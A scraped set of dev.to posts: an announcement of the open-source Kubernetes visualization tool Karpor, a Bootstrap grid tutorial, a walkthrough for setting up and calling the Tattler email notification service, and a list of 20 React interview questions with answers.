https://dev.to/elliotxx/karpor-has-been-open-sourced-we-build-a-kubernetes-visualization-tool-in-the-ai-era-18am
kubernetes, opensource, cloudnative, ai
## 🔔 What is Karpor? Today we are excited to announce that Karpor is now open-source! 🎉🎉🎉 Karpor is a **Modern Kubernetes Visualization Tool**. Its core features focus on **🔍 Search, 📊 Insight and ✨ AI**. The goal is to connect platforms and multi-clusters more easily and quickly, and use AI to empower Kubernetes to extract key insights from the proliferation of cluster resources and provide them to end users. Karpor is designed to reduce the complexity of using Kubernetes, so that developers and platform teams can extract the most valuable information more effectively and intuitively. **GitHub**: [https://github.com/KusionStack/karpor](https://github.com/KusionStack/karpor) ![image.png](https://miro.medium.com/v2/0*tQEAHm6KOxZn5lLT.png) ## 🚀 Why Karpor? The increasing complexity of the Kubernetes ecosystem is an undeniable trend that is becoming more and more difficult to manage. This complexity not only entails a heavier burden on operations and maintenance but also slows down the adoption of new technologies by users, limiting their ability to fully leverage the potential of Kubernetes. ![image](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*MGHG6nCjUTFaTdTK) As an experienced _Kubernetes YAML Engineer_, you may have also encountered the following perplexities: - The cluster is like a black box: sometimes all you can see is a KubeConfig, and you can't see what happens behind it - The team/company has a specific business domain model and needs to establish a mapping between existing systems and Kubernetes resources - The application has been deployed to multiple Kubernetes clusters, but its topology is not fully visible We have used several Kubernetes visualization tools over time, such as Lens, k9s, kube-explorer, and the Kubernetes Dashboard, among others. Some are commercialized, some do not support self-hosting, and some are too rudimentary for production needs... In short, we have not yet encountered a product that we are completely satisfied with.
The recent rise of large language models has sparked an unprecedented wave of artificial intelligence innovations. This time, AI technology has remarkably made its way into people's everyday lives. Even my retired parents have started using AI services, which makes me believe that we are at a historic moment that is reshaping the world. So naturally we started building a lightweight, AI-empowered Kubernetes visualization tool to solve the problems mentioned earlier. It features the following: - Fully empowers Kubernetes with **AI**. - **Identifies** **potential risks** and provides **solutions based on AI**. - **Intuitive and effective search**, providing a number of user-friendly ways to locate resources across clusters, such as keywords, SQL, and natural language. - **Customized logical views** to fit the resource organization models for different scenarios, such as applications, environments, etc., which may be interpreted differently in different places. - **Travel back in time** via the timeline and time machine to quickly diagnose and **troubleshoot** based on historical snapshots. - **Cross-cluster topological views**, providing a global perspective of resources no matter where they are. - **Low cognitive burden**: it is read-only, non-invasive to the cluster it's watching, and users can deploy it to their private environments with one click. We have named this tool Karpor.
In general, we wish Karpor to focus on 🔍 search, 📊 insights, and ✨ AI, to break through the increasingly complex maze of Kubernetes, achieving the following value proposition: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*mGj5TBnkW2ntSAXG.png) As of today, we have built the initial version of Karpor based on this vision, which features the following: - An optimized **search experience** for Kubernetes: ![image.png](https://miro.medium.com/v2/0*gxvK8D7RorBzGqA-.png) - Discover potential problems through **compliance reports**: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*BSuWWBq01CbJuVcU.png) - Manage the **customized logical views**: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*4uFnPDPRy8x7o2DL.png) ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*UFeMV4EfuLbZF-dA.png) ## 🙌 Karpor vs. Kubernetes Dashboard In today's Kubernetes ecosystem, there are multiple tools and platforms that can manage and visualize clusters. Kubernetes Dashboard is an officially provided universal web UI for managing and troubleshooting Kubernetes clusters. Karpor, as an emerging Kubernetes Visualization Tool, is designed to provide more advanced features and a better user experience. Here are some key comparisons between Karpor and Kubernetes Dashboard: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*P0qkIpE_AalUkwPd.png) ## 🎖️ Vision: Embracing the Community We firmly believe that a successful open-source project should be community-driven. For open-source projects, we come up with an idea and build an initial version; the final form of the project, we believe, should be guided by the community. Therefore, we are committed to shaping Karpor into something that is: - **Small and beautiful**: Focused on an excellent user experience. - **Vendor-neutral**: Independent from any specific cloud services or companies.
- **Developer-friendly**: Community-friendly with high-quality documentation and support. - **Community-driven**: Encouraging and welcoming contributors to participate in and even lead the development of the project. We place great emphasis on community participation and contribution. To this end, we have specially put together a community task list to help those who are interested quickly get started and participate in the project. The tasks are categorized by difficulty, ranging from simple tasks such as document translation, bug fixes, and unit testing, to medium-difficulty tasks like log/event aggregators, risk audit enhancements, and automatic cluster imports, to challenging tasks such as OpenCost integration and login authentication. We encourage every developer interested in Karpor to visit our GitHub page, review the task list, and contribute with ease. 🎖︎ Community Task List: [https://github.com/KusionStack/karpor/issues/463](https://github.com/KusionStack/karpor/issues/463) All developers who participate in the community will be featured in the Contributors section on the README and the homepage of the official website. We extend our sincerest thanks to all the developers and contributors already active in the Karpor open-source project for their efforts and creativity! We look forward to working with the community to make Karpor an even more powerful and comprehensive open-source tool. ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*tEvJY0WIXbkrLIIF.png) ## 🌈 Moving Forward We are actively soliciting feedback and suggestions from the community to plan the next version of Karpor — v0.5. We want to hear your voice, whether it's feature requests, improvement suggestions, or bug reports; please leave a comment in the corresponding issue. Our **ultimate goal is to shape Karpor into a community-driven Kubernetes Visualization Tool in the AI era**. Currently, what we have is a usable version with basic functionalities.
In the next version, we will solidify the basic functionalities and fully embrace AI. We have preliminarily planned some new features, such as support for natural language search of cluster resources, AI-driven diagnostic suggestions, timelines, etc., to help users better understand resources in multiple clusters, identify issues, and troubleshoot. We welcome everyone's feedback! **If you like this project, please give it a Star on GitHub 🌟🌟🌟** [https://github.com/KusionStack/karpor](https://github.com/KusionStack/karpor)
elliotxx
1,908,795
Bootstrap Tutorials: Grid system
Grid system Bootstrap grid is a powerful system for building mobile-first websites. It...
27,869
2024-07-02T15:00:00
https://dev.to/keepcoding/bootstrap-tutorials-grid-system-4ka7
bootstrap, learning, grid, design
## Grid system Bootstrap grid is a powerful system for building mobile-first websites. It uses a series of containers, rows, and columns to lay out and align content. It’s built with flexbox and is fully responsive. Some people even think that grid is the most important reason to use Bootstrap, so in this lesson, we will get to know this incredibly useful tool in depth. ## Container Bootstrap grid needs a container to work properly. We learned about containers in the previous lesson, so we won't dwell on them here. In our current project, we have already added a container and it looks like this: **HTML** ``` <div class="container" style="height: 500px; background-color: red"> </div> ``` And this is what the container should look like when rendered in our browser: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qt2l3a7fmxp3ygw8lep2.png) ## Row Next, we need a row. Rows are wrappers for columns. If you want to split your layout horizontally, use .row. Let's add 2 rows to our container: **HTML** ``` <div class="container" style="height: 500px; background-color: red"> <div class="row" style="background-color: blue;"> I am a first row </div> <div class="row" style="background-color: lightblue;"> I am a second row </div> </div> ``` _**Note:** Again, for demonstration purposes, we're adding inline CSS (background colors) to help us visually see the changes we're going to make to our design._ After saving the file and refreshing your browser, you should see 2 new rows. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/we8j0j713jfn1aj43qq4.png) ## Columns Then it's time for the columns. Bootstrap grid allows you to add up to 12 columns in one line. If you add more than 12, the excess columns will jump to the next line.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yaqvkaluvubl5uz22crb.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col"> 1 </div> <div class="col"> 2 </div> <div class="col"> 3 </div> <div class="col"> 4 </div> <div class="col"> 5 </div> <div class="col"> 6 </div> <div class="col"> 7 </div> <div class="col"> 8 </div> <div class="col"> 9 </div> <div class="col"> 10 </div> <div class="col"> 11 </div> <div class="col"> 12 </div> </div> </div> ``` _**Remember:** for the grid to work properly, you should always place columns in rows, and rows in containers._ Columns are incredibly flexible. You can define how wide each column should be and how each of them should behave on different screen widths. Thanks to this, you can easily adjust your layout for both mobile devices and desktops. For example, if you want to insert 2 columns of equal width, you can use the following code: **HTML** ``` <div class="container"> <div class="row"> <div class="col-6">First column</div> <div class="col-6">Second column</div> </div> </div> ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o224d8usj3bwuqjl2yev.png) As you can see, we've added the digit 6 to the col class. This (col-6 class) means that we want each column to be 6 units wide. You can freely set the width of the columns, just make sure that the sum of their width units **does not exceed 12**. col-6 + col-6 together give 12 units, which means 2 identical columns.
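To make the 12-unit rule concrete, here is a tiny JavaScript helper (our own illustration, not part of Bootstrap) that checks whether a set of column spans fits within a single row:

```javascript
// Toy helper (illustration only, not part of Bootstrap): does a set of
// column spans fit within one 12-unit grid row?
function fitsOneRow(spans) {
  return spans.reduce((sum, span) => sum + span, 0) <= 12;
}

fitsOneRow([6, 6]);    // true — exactly 12 units
fitsOneRow([4, 8, 2]); // false — 14 units, so the last column wraps
```

The same arithmetic is what the grid applies visually: anything past 12 units simply wraps to the next line.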
If you would like the right column to be slightly larger than the left column, you can set it as follows: **HTML** ``` <div class="container"> <div class="row"> <div class="col-4">First column</div> <div class="col-8">Second column</div> </div> </div> ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ww5zpv4k9zbik8fvgpo2.png) 4 (col-4) + 8 (col-8) = 12 This way you've created a very typical layout with the main column on the right and the sidebar space on the left - that's exactly the scheme this tutorial uses! **However, there is one problem with the above example** - no matter the screen size, our columns remain in the same proportions. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v9a6nsvgehoj2hvjvv70.png) The 4/8 ratio is very useful on large screens where there is plenty of space. However, on mobile devices, dividing a small screen additionally into 2 parts of 4 and 8 units is not acceptable. It would not be comfortable to use such a layout. **Here again, breakpoints come to the rescue.** Do you remember the definition below from our previous lesson? _**Breakpoints** are the triggers in Bootstrap for how your layout responsively changes across device or viewport sizes._ As in containers, we can also use breakpoints in columns and define from what width we want the column to extend to full width. Taking the example from earlier, let's say we want both of our columns to be **full-width** on small and medium screens, and to change to a **4/8 ratio** on large screens.
**HTML** ``` <div class="container"> <div class="row"> <div class="col-md-4">First column</div> <div class="col-md-8">Second column</div> </div> </div> ``` All we have to do is add a breakpoint -md (meaning "medium screen size") to the col class, so that the Bootstrap grid knows that we want a 4/8 column ratio only on screens bigger than medium size, and on other screens (medium and small size) the columns should be stretched to full width. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0j9zrpbhm78rm0m55lmz.gif) **To sum up** - by using class col-md-4, we tell the grid the following: - On screens **smaller than 768px**, I want this column to stretch to full width - On screens **larger than 768px**, I want this column to be 4 units wide Take a look at the table below and see what breakpoints you can use when creating a layout: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rx3l26qyiu88uzh3nzh8.png) Okay, enough of this theory. Now let's work on some real-life examples. **Three equal columns** Get three equal-width columns starting at desktops and scaling to large desktops. On mobile devices, tablets and below, the columns will automatically stack. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6drnl663n6ly799t4ysn.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col-md-4">.col-md-4</div> <div class="col-md-4">.col-md-4</div> <div class="col-md-4">.col-md-4</div> </div> </div> ``` **Three unequal columns** Get three columns of various widths, starting at desktops and scaling to large desktops. Remember, grid columns should add up to twelve for a single horizontal block. More than that, and columns start stacking no matter the viewport.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wbfb90twet4xvu81qhd2.png) **HTML** ``` <div class="container"> <div class="row"> <div class="col-md-3">.col-md-3</div> <div class="col-md-6">.col-md-6</div> <div class="col-md-3">.col-md-3</div> </div> </div> ``` **Two columns with two nested columns** Nesting is easy—just put a row of columns within an existing column. This gives you two columns starting at desktops and scaling to large desktops, with another two (equal widths) within the larger column. At mobile device sizes, tablets and down, these columns and their nested columns will stack. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prwc30j43mqbmrnaz9ox.png) **HTML** ``` <div class="container"> <!-- Outer row --> <div class="row"> <div class="col-md-8"> .col-md-8 <!-- Inner row --> <div class="row"> <div class="col-md-6">.col-md-6</div> <div class="col-md-6">.col-md-6</div> </div> </div> <div class="col-md-4">.col-md-4</div> </div> </div> ``` I think you now have a rough idea of how it works. Bootstrap grid is a very advanced tool and at first its use can be overwhelming. If you feel that not everything is clear to you - **that's completely normal and fine**. It just takes practice. You will gain confidence and fluency over time. It's been a long lesson, but don't hesitate to repeat it to yourself to consolidate your knowledge. If you want to practice on your own and have a look at more examples read the **[grid system documentation page](https://mdbootstrap.com/docs/standard/layout/grid/)** or play with our **[grid generator](https://mdbootstrap.com/docs/standard/tools/builders/grid/)**. **[Demo & source code for this lesson](https://mdbootstrap.com/snippets/standard/ascensus/4609158)**
keepcoding
1,909,054
The right way to email your users
Overcome common issues when emailing users from your web application, using the open-source notification system Tattler. A tutorial from zero to integrated.
0
2024-07-02T14:53:50
https://dev.to/mmic/the-right-way-to-email-your-users-2pnn
notifications, email, sms, python
When you build a web application you need to email your users for password resets, orders placed and the like. A trivial task, it seems. Here's a one-liner in Django: ```python from django.core.mail import send_mail send_mail("Password changed!", f"Hey {request.user.first_name}!\n\nYour password changed...", "support@yourservice.com", [request.user.email], fail_silently=False) ``` # Reality kicks in A one-liner. Problem solved, now moving on. But soon after, issues arise: 1. You want to include some special characters like '🙂' or 'schön'. The one-liner no longer works. 1. You need some conditional text for paying users. Which requires some **templating** logic. 1. Some users fail to receive your notifications because their **spam filter** distrusts your bare-bones emails. Figure out what they need and build it. 1. You want **branded** emails with your logo and stationery. You need to build complex MIME/multipart assemblies. 1. You need to **prevent delivery** to actual users during development from your dev environment. You need environment-specific logic. You can surely address each hurdle. Your one-liner grows into 10, 100, 1000 lines of code. It may grow organically, adapted at every notification-sending point. Or in a structured way - leading you to build your own DIY notification framework. # Notification system You *may* build your DIY notification system, experiencing and overcoming one problem after another. But why go through the pain if the work is already done? [Tattler](https://tattler.dev) solves all the problems above and more.
It's a lightweight service you deploy within minutes, and your notification one-liners stay a one-liner: ```python from tattler.client.tattler_py import send_notification # trigger notification in Python code send_notification('website', 'password_changed', request.user.email) ``` You can call tattler from any language and tech stack -- with one call to its REST API: ```bash # trigger notification via REST API in any language curl -XPOST http://localhost:11503/notification/website/password_changed?user=foo@bar.com ``` Notification templates look like this: ```jinja Hey {{ user_firstname }}! 👋🏻 A quick heads up that your password was changed. If it was you, all good. If it wasn't, reply to this email without delay. {% if user_account_type == 'premium' %} P.S.: Thank you for supporting us with your premium account! 🤩 {% endif %} ``` # Deploying tattler Install Tattler into an own folder `~/tattler_quickstart`, with this structure: ``` ~/tattler_quickstart/ ├── conf/ # configuration files ├── templates/ # templates for notifications └── venv/ # python virtual environment holding the code ``` Here's a terminal session performing the steps in this guide: {% embed http://asciinema.org/a/666512 %} ## Installation Create this directory structure: ```bash # create the directory structure above mkdir -p ~/tattler_quickstart cd ~/tattler_quickstart mkdir conf templates # create and load a virtualenv to install into python3 -m venv ~/tattler_quickstart/venv . ~/tattler_quickstart/venv/bin/activate # install tattler into it pip install tattler ``` ## Configuration Tattler's configuration is organized in a bunch of files (envdir), whose filename is the configuration key and content its value. 
We'll configure the following: ``` ~/tattler_quickstart/ └── conf/ ├── TATTLER_MASTER_MODE # actually deliver notifications ├── TATTLER_SMTP_ADDRESS # IP:port of the SMTP server └── TATTLER_SMTP_AUTH # username:password SMTP credentials ``` Let's do it: ```bash cd ~/tattler_quickstart/conf echo 'production' > TATTLER_MASTER_MODE # replace with your SMTP server echo '127.0.0.1:25' > TATTLER_SMTP_ADDRESS echo 'username:password' > TATTLER_SMTP_AUTH chmod 400 TATTLER_SMTP_AUTH ``` # Running tattler At this point tattler is ready to run, so let's! ```bash # run this from the terminal where you loaded your virtual environment envdir ~/tattler_quickstart/conf tattler_server ``` And tattler will confirm: ``` INFO:tattler.server.pluginloader:Loading plugin PassThroughAddressbookPlugin (<class 'passthrough_addressbook_tattler_plugin.PassThroughAddressbookPlugin'>) from module passthrough_addressbook_tattler_plugin INFO:tattler.server.tattlersrv_http:Using templates from /../tattler_quickstart/templates INFO:tattler.server.tattlersrv_http:==> Meet tattler @ https://tattler.dev . If you like tattler, consider posting about it! ;-) WARNING:tattler.server.tattlersrv_http:Tattler enterprise now serving at 127.0.0.1:11503 ``` Done! ✅ ## Sending a test notification Ask tattler to send a test notification with the `tattler_notify` command: ```bash # [ recipient ] [ scope ] [ event ] [ do send! ] tattler_notify my@email.com demoscope demoevent -m production ``` This sends a demo notification embedded in tattler, so you don't need to write your own content. `-m production` tells tattler to deliver to the actual recipient `my@email.com`. Without it, tattler will safely operate in development mode and divert any delivery to a development address (configured in `TATTLER_DEBUG_RECIPIENT_EMAIL`) so real users aren’t accidentally sent emails during development. Proceed to your mailbox to find the result. If nothing has arrived, check the logs of `tattler_server`.
They should look like this: ``` [...] INFO:tattler.server.sendable.vector_email:SMTP delivery to 127.0.0.1:25 completed successfully. INFO:tattler.server.tattlersrv_http:Notification sent. [{'id': 'email:b386e396-7ad4-4d50-bc2c-1406bf6a8814', 'vector': 'email', 'resultCode': 0, 'result': 'success', 'detail': 'OK'}] ``` If they don't, you'll see an error description. Most likely your SMTP server is misconfigured, so check again [Configuration](#configuration) and restart `tattler_server` when fixed. Next, you'll want to write your own content to notify users. # Templates Write your own template to define what content to send upon an event like "password_changed". Templates are folders organized in this directory structure: ``` ~/tattler_quickstart/ └── templates/ # base directory holding all notification templates └── website/ # an arbitrary 'scope' (ignore for now) ├── password_changed/ # template to send when user changes password ├── order_placed/ # template to send when user places an order └── ... ``` What does the content of the event template itself look like? ``` password_changed/ # arbitrary event name for the template └── email/ ├── body.html # template to expand for the HTML body ├── body.txt # template to expand for the plain text body └── subject.txt # template to expand for the subject ``` Let's proceed to create the directories for one: ```bash cd ~/tattler_quickstart mkdir -p templates/password_changed/email ``` ## Plain text template Now, edit file `email/body.txt` with the content of the plain text email. This is seen by users of webmails or email applications that lack support for HTML emails. ```jinja {# file email/body.txt (this is a comment) #} Hey {{ user_firstname }}! 👋🏻 A quick heads up that your password was changed. If it was you, all good. If it wasn't, reply to this email without delay. {% if user_account_type == 'premium' %} P.S.: Thank you for supporting us with your premium account! 
🤩 {% endif %} ``` ## Subject Next, edit file `email/subject.txt` with the subject of the email: ```jinja Warning: password changed for account {{ user_email }}! ⚠️ ``` Notice that the subject supports both non-ASCII characters and templating too! 😎 ## HTML template Then, edit file `email/body.html` with HTML content. Here's where you implement your company's stationery -- colors, logo, fonts, layout and all. Make sure to stick to HTML constructs supported by email clients! That's MUCH less than your browser does. See [caniemail.com](https://caniemail.com) for help. ```jinja {# file email/body.html (this is a comment) #} <html> <head><title>Your password was changed!</title></head> <body> <h1>Dear {{ user_firstname }}! 👋🏻</h1> <p>A quick heads up that <strong>your password was changed</strong>!</p> <p>If it was you, all good. If it wasn't, reply to this email without delay.</p> {% if user_account_type == 'premium' %} <p style="color: darkgray">P.S.: Thank you for supporting us with your premium account! 🤩</p> {% endif %} </body> </html> ``` ## Send your template Now that you've got your own template, tell tattler to deliver it: ```bash # [ recipient ] [ scope ] [ event ] [ do send! ] tattler_notify my@email.com website password_changed -m production ``` Check your inbox and that's it! # Integration Now that tattler runs and you provisioned your template, how to have it sent from your code? Whenever your application wants to notify an event, like "password changed", you can fire it either: - From python via tattler's native client API. - From any other language via tattler's REST API. Let's look at some concrete examples. ## Python Tattler is written in python, so python developers can use its native python API: ```python from tattler.client.tattler_py import send_notification send_notification('website', 'password_changed', request.user.email) ``` ## REST API This works with any language and tech stack. 
Simply make a POST request to `127.0.0.1:11503` ``` http://localhost:11503/notification/website/password_changed?user=foo@bar.com [ API base URL ] [scope] [event name] [ recipient ] ``` Notice the following: - Host `localhost` and TCP port `11503` - Base URL of the API = `http://localhost:11503/notification/` - POST request (not GET)! - `website` is the scope name (see [Templates](#templates)) - `password_changed` is the template name (see [Templates](#templates)) - `user=foo@bar.com` tells tattler whom to send to Here’s how to leverage this from a number of programming languages. ## Go ```go package main import ( "net/http" ) func main() { resp, err := http.Post("http://localhost:11503/notification/website/password_changed?user=my@email.com", "application/json", nil) if err != nil { panic(err) } defer resp.Body.Close() } ``` ## C# ```c# using System.Net.Http; using System.Threading.Tasks; public class Program { public static async Task Main(string[] args) { using var client = new HttpClient(); var response = await client.PostAsync("http://localhost:11503/notification/website/password_changed?user=my@email.com", null); } } ``` ## Java ```java import java.net.URI; import java.net.http.HttpClient; import java.net.http.HttpRequest; import java.net.http.HttpResponse; public class App { public static void main(String[] args) throws Exception { HttpClient client = HttpClient.newHttpClient(); HttpRequest request = HttpRequest.newBuilder() .uri(new URI("http://localhost:11503/notification/website/password_changed?user=my@email.com")) .header("Content-Type", "application/json") .POST(HttpRequest.BodyPublishers.noBody()) .build(); HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString()); } } ``` ## Swift ```swift import Foundation let url = URL(string: "http://localhost:11503/notification/website/password_changed?user=my@email.com")!
var request = URLRequest(url: url) request.httpMethod = "POST" request.setValue("application/json", forHTTPHeaderField: "Content-Type") request.httpBody = Data() let task = URLSession.shared.dataTask(with: request) { data, response, error in if let httpResponse = response as? HTTPURLResponse { print("Response Code: \(httpResponse.statusCode)") } } task.resume() ``` # Conclusion That's it. You installed and tested tattler within minutes, and integrated it into your code within a few more minutes. As your needs grow, tattler smoothly accommodates them without bloating your codebase. Advanced topics include passing variables to templates, sending SMS, having tattler plug-ins automatically retrieve user addresses or template variables. Find it all in [tattler's thorough documentation](https://docs.tattler.dev). Tattler is [proudly open-source](https://github.com/tattler-community/tattler-community), with a vastly liberal license (BSD) allowing commercial use. And if your company's policies require support and maintenance for every dependency, tattler offers them in an [enterprise subscription](https://tattler.dev/#enterprise), plus more features like S/MIME, multilingualism and delivery with Telegram and WhatsApp.
mmic
1,909,055
JavaScript
Top 20 React.JS interview questions. javascript react interview node As a React developer, it is...
0
2024-07-02T14:53:24
https://dev.to/mahadizulfiker/javascript-om8
javascript, webdev, beginners, programming
Top 20 React.JS interview questions. # javascript # react # interview # node As a React developer, it is important to have a solid understanding of the framework's key concepts and principles. With this in mind, I have put together a list of 20 important questions that every React developer should know, whether they are interviewing for a job or just looking to improve their skills. Before diving into the questions and answers, I suggest trying to answer each question on your own before looking at the answers provided. This will help you gauge your current level of understanding and identify areas that may need further improvement. Let's get started! 01. What is React and what are its benefits? Ans: React is a JavaScript library for building user interfaces. It is used for building web applications because it allows developers to create reusable UI components and manage the state of the application in an efficient and organized way. 02. What is the virtual DOM and how does it work? Ans: The Virtual DOM (Document Object Model) is a representation of the actual DOM in the browser. It enables React to update only the specific parts of a web page that need to change, instead of rewriting the entire page, leading to increased performance. When a component's state or props change, React will first create a new version of the Virtual DOM that reflects the updated state or props. It then compares this new version with the previous version to determine what has changed. Once the changes have been identified, React will then update the actual DOM with the minimum number of operations necessary to bring it in line with the new version of the Virtual DOM. This process is known as "reconciliation". The use of a Virtual DOM allows for more efficient updates because it reduces the amount of direct manipulation of the actual DOM, which can be a slow and resource-intensive process. 
By only updating the parts that have actually changed, React can improve the performance of an application, especially on slow devices or when dealing with large amounts of data.

**03. How does React handle updates and rendering?**

Ans: React handles updates and rendering through a virtual DOM and component-based architecture. When a component's state or props change, React creates a new version of the virtual DOM that reflects the updated state or props, then compares it with the previous version to determine what has changed. React updates the actual DOM with the minimum number of operations necessary to bring it in line with the new version of the virtual DOM, a process called "reconciliation". React also uses a component-based architecture where each component has its own state and render method, and it re-renders only the components that have actually changed. It does this efficiently and quickly, which is why React is known for its performance.

**04. Explain the concept of components in React.**

Ans: A React component is a JavaScript function or class that returns a React element, which describes the UI for a piece of the application. Components can accept inputs called "props", and manage their own state.

**05. What is JSX and why is it used in React?**

Ans: JSX is a syntax extension for JavaScript that allows embedding HTML-like syntax in JavaScript. It is used in React to describe the UI, and is transpiled to plain JavaScript by a build tool such as Babel.

**06. What is the difference between state and props?**

Ans: State and props are both used to store data in a React component, but they serve different purposes and have different characteristics. Props (short for "properties") are a way to pass data from a parent component to a child component. They are read-only and cannot be modified by the child component. State, on the other hand, is an object that holds the data of a component that can change over time.
It can be updated using the setState() method and is used to control the behavior and rendering of a component.

**07. What is the difference between controlled and uncontrolled components in React?**

Ans: In React, controlled and uncontrolled components refer to the way that forms are handled. A controlled component is one where the value of input fields is set by state and changes are managed by React's event handlers. This allows for better control over the form's behavior and validation, and makes it easy to handle form submission. An uncontrolled component is one where the value of the input fields is set by the default value attribute and changes are managed by the browser's default behavior. This approach offers less control, and it is harder to handle form submission and validation.

**08. What is Redux and how does it work with React?**

Ans: Redux is a predictable state management library for JavaScript applications, often used with React. It provides a centralized store for the application's state, and uses pure functions called reducers to update the state in response to actions. In a React app, Redux is integrated with React via the react-redux library, which provides the connect function for connecting components to the Redux store and dispatching actions. The components can access the state from the store, and dispatch actions to update the state, via props provided by the connect function.

**09. Can you explain the concept of Higher Order Components (HOC) in React?**

Ans: A Higher Order Component (HOC) in React is a function that takes a component and returns a new component with additional props.
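As a sketch of this idea, components can be modeled as plain functions that take props and return strings (a deliberate simplification; real React components return elements). The `withAuth` name is invented for illustration:

```javascript
// A plain-function "component".
const Dashboard = (props) => `Welcome back, ${props.user}`;

// A higher-order "component": a function that takes a component and
// returns a new, enhanced component.
const withAuth = (Component) => (props) =>
  props.isLoggedIn ? Component(props) : 'Please log in';

const ProtectedDashboard = withAuth(Dashboard);

ProtectedDashboard({ isLoggedIn: true, user: 'Ada' }); // → "Welcome back, Ada"
ProtectedDashboard({ isLoggedIn: false });             // → "Please log in"
```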
HOCs are used to reuse logic across multiple components, such as adding a common behavior or styling. They are used by wrapping a component within the HOC, which returns a new component with the added props. The original component is passed as an argument to the HOC, and receives the additional props via destructuring. HOCs are pure functions, meaning they do not modify the original component, but return a new, enhanced component. For example, an HOC could be used to add authentication behavior to a component, such as checking if a user is logged in before rendering the component. The HOC would handle the logic for checking if the user is logged in, and pass a prop indicating the login status to the wrapped component. HOCs are a powerful pattern in React, allowing for code reuse and abstraction, while keeping the components modular and easy to maintain.

**10. What is the difference between server-side rendering and client-side rendering in React?**

Ans: Server-side rendering (SSR) and client-side rendering (CSR) are two different ways of rendering a React application. In SSR, the initial HTML is generated on the server and then sent to the client, where it is hydrated into a full React app. This results in a faster initial load time, as the HTML is already present on the page and can be indexed by search engines. In CSR, the initial HTML is a minimal, empty document, and the React app is built and rendered entirely on the client. The client makes API calls to fetch the data required to render the UI. This results in a slower initial load time, but a more responsive and dynamic experience, as all the rendering is done on the client.

**11. What are React Hooks and how do they work?**

Ans: React Hooks are a feature in React that allow functional components to have state and other lifecycle capabilities without using class components. They make it easier to reuse state and logic across multiple components, making code more concise and easier to read.
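One way to build intuition for how a hook can "remember" state between renders is a toy re-implementation. This is NOT React's real implementation; the names `hookState`, `hookIndex`, and `render` are invented for illustration:

```javascript
// Module-level storage for hook values, indexed by call order.
let hookState = [];
let hookIndex = 0;

function useState(initial) {
  const i = hookIndex++;
  if (hookState[i] === undefined) hookState[i] = initial;
  const setState = (value) => { hookState[i] = value; };
  return [hookState[i], setState];
}

// "Rendering" just means calling the component with the hook cursor reset.
function render(component) {
  hookIndex = 0;
  return component();
}

// A "component" using the toy hook.
function Counter() {
  const [count, setCount] = useState(0);
  return { count, increment: () => setCount(count + 1) };
}

let ui = render(Counter);
ui.increment();       // writes 1 into the stored hook state
ui = render(Counter); // the next render reads the updated state
// ui.count is now 1
```

The call-order indexing in this sketch is also why hooks must not be called conditionally: the cursor would point at the wrong slot on the next render.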
Hooks include useState for adding state and useEffect for performing side effects in response to changes in state or props. They make it easier to write reusable, maintainable code.

**12. How does React handle state management?**

Ans: React handles state management through its state object and setState() method. The state object is a data structure that stores values that change within a component and can be updated using the setState() method. State updates trigger a re-render of the component, allowing it to display updated values dynamically. React updates the state in an asynchronous and batched manner, ensuring that multiple setState() calls are merged into a single update for better performance.

**13. How does the useEffect hook work in React?**

Ans: The useEffect hook in React allows developers to perform side effects, such as data fetching, subscriptions, and setting up/cleaning up timers, in functional components. It runs after the render is committed to the screen, including after the first render. The useEffect hook takes two arguments: a function to run after the render, and an array of dependencies that determines when the effect should be run. If the dependency array is absent, the effect runs after every render; if it is an empty array, the effect runs only once, after the first render.

**14. Can you explain the concept of server-side rendering in React?**

Ans: Server-side rendering (SSR) in React is the process of rendering components on the server and sending fully rendered HTML to the browser. SSR improves the initial loading performance and SEO of a React app by providing fully rendered HTML to the browser, reducing the amount of JavaScript that needs to be parsed and executed on the client, and improving the indexing of the page by search engines.

**15. How does React handle events and what are some common event handlers?**

Ans: React handles events through its event handling system, where event handlers are passed as props to components. Event handlers are functions that are executed when a specific event occurs, such as a user clicking a button. Common event handlers in React include onClick, onChange, and onSubmit. The event handler receives an event object, which contains information about the event, such as the target element, the type of event, and any data associated with the event. Event handlers should be passed as props to the components, and defined within the component or in a separate helper function.

**16. Can you explain the concept of React context?**

Ans: React context is a way to share data between components without passing props down manually through every level of the component tree. The context is created with a provider and consumed by multiple components using the useContext hook.

**17. How does React handle routing and what are some popular routing libraries for React?**

Ans: React handles routing through libraries such as React Router, which provides routing capabilities to React applications. Other popular routing options for React include Reach Router and Next.js.

**18. What are some best practices for performance optimization in React?**

Ans: Best practices for performance optimization in React include using memoization, avoiding unnecessary re-renders, using lazy loading for components and images, and using the right data structures.

**19. How does React handle testing and what are some popular testing frameworks for React?**

Ans: React applications are tested using frameworks such as Jest, Mocha, and Enzyme. Jest is a popular testing framework for React applications, while Mocha and Enzyme are also widely used.

**20. How do you handle asynchronous data loading in React?**
Ans: Asynchronous data loading in React can be handled using various methods such as the fetch API, Axios, or other network libraries. It can also be handled using the useState and useEffect hooks to trigger a state update when data is returned from the API call. It is important to handle loading and error states properly to provide a good user experience.

